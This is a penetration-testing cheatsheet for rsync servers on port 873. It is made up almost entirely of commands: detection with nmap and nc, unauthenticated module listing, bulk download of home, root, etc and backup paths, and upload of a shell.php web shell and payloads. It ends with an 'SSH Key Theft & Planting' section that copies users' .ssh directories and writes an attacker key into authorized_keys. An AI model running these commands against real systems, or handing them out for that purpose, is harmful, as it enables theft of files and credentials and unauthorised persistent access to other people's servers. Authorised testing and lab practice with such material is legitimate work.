Rsync Enumeration Cheatsheet
Default Port: 873 (TCP)
Detection
nmap -p 873 <ip>
nmap -p 873 -sV <ip>
nmap -p 873 --script rsync-list-modules <ip>
nc -nv <ip> 873
List Available Modules (Shares)
# List modules (no auth)
rsync -av --list-only rsync://<ip>/
rsync rsync://<ip>/
# nc banner grab
nc -nv <ip> 873
# Then type: #list
Enumerate Files in a Module
rsync -av --list-only rsync://<ip>/<module>/
rsync -av --list-only rsync://<ip>/<module>/subdir/
# Recursive listing of entire module
rsync -r --list-only rsync://<ip>/<module>/
Download Files
# Download single file
rsync rsync://<ip>/<module>/file.txt ./
# Download entire module
rsync -av rsync://<ip>/<module>/ ./local_copy/
# With credentials
rsync -av rsync://<user>@<ip>/<module>/ ./
rsync --password-file=pass.txt rsync://<user>@<ip>/<module>/ ./
# Dry run (see what would be downloaded)
rsync -av --dry-run rsync://<ip>/<module>/ ./
Upload Files
# Upload single file
rsync -av ./shell.php rsync://<user>@<ip>/<module>/
# Upload directory
rsync -av ./payload/ rsync://<user>@<ip>/<module>/uploads/
# With password file
rsync --password-file=pass.txt -av ./file rsync://<user>@<ip>/<module>/
High-Value Paths to Check
rsync -av --list-only rsync://<ip>/home/
rsync -av --list-only rsync://<ip>/root/
rsync -av --list-only rsync://<ip>/etc/
rsync -av --list-only rsync://<ip>/backup/
rsync -av --list-only rsync://<ip>/var/www/
rsync -av --list-only rsync://<ip>/.ssh/
SSH Key Theft & Planting
# Download .ssh directory
rsync -av rsync://<ip>/home/<user>/.ssh/ ./stolen_keys/
# Plant authorized_keys (if write access)
rsync -av ~/.ssh/id_rsa.pub rsync://<user>@<ip>/home/<user>/.ssh/authorized_keys
Nmap Scripts
nmap -p 873 --script rsync-list-modules <ip>